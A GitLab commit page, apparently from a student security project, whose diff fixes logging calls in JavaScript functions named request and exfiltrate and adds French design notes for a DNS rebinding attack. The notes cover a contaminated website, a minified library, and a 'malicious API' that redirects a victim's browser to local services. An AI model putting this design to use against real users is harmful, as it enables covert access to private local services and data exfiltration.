Ce serveur Gitlab sera éteint le 30 juin 2020, pensez à migrer vos projets vers les serveurs gitlab-research.centralesupelec.fr et gitlab-student.centralesupelec.fr !

Commit 2a1d91ce authored by Sami Tabet's avatar Sami Tabet

more doc about entities

parent b90b0332
......@@ -20,7 +20,7 @@ async function request(uri) {
const txt = await data.text();
return txt;
} catch (e) {
console.err(e);
console.error(e);
}
}
......@@ -31,7 +31,7 @@ async function exfiltrate(data) {
body: data,
})
} catch (e) {
console.err(e);
console.error(e);
}
}
......
......@@ -41,3 +41,16 @@ Problèmes qu'on peut rencontrer:
- Content Security Policy (c'est le cas sur github par exemple)
- Cache DNS du navigateur qu'il faut réussir à flush plus ou moins rapidement (il y a 2 techniques décrites dans [le wiki de rebind.it](https://github.com/nccgroup/singularity))
- HTTPS: si on est sur un site en HTTPs on ne peut query que du HTTPs (sinon on a une mixed content error), il faudrait donc vérifier que le DNS rebinding fonctionne avec du HTTPs
---
Différentes entités:
- La cible dans l'environnement local de la victime (par exemple un ES qui tourne sur la machine de la victime ou sur un autre host local).
- La victime et son browser
- Le site internet contaminé qui contiendra notre librairie minifiée avec le code du DNS rebinding intégré.
- Notre serveur (DNS + Legit API + API malicieuse pour changer la résolution DNS):
- - Notre librairie JS sera en fait un wrapper autour de l'API legit de ce serveur, ce qui permettra d'assurer le fait que les CSP ne soient pas un problème lors du DNS rebinding
- - L'API malicieuse permettra de changer la résolution DNS depuis la victime (par exemple si on veut accéder à 127.0.0.1:8080 en passant par le NDD `api.notresite.fr` on aura juste à faire une requête POST sur /secret-api/dns avec ces paramètres et la prochaine résolution DNS pour `api.notresite.fr` venant de l'IP de la victime ayant fait la précédente requête POST retournera 128.0.0.1)
- - Le serveur DNS sera entièrement contrôlé par l'API malicieuse
- Le responsable du NDD pour notre serveur qui devra redirigé les requêtes DNS vers notre DNS.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment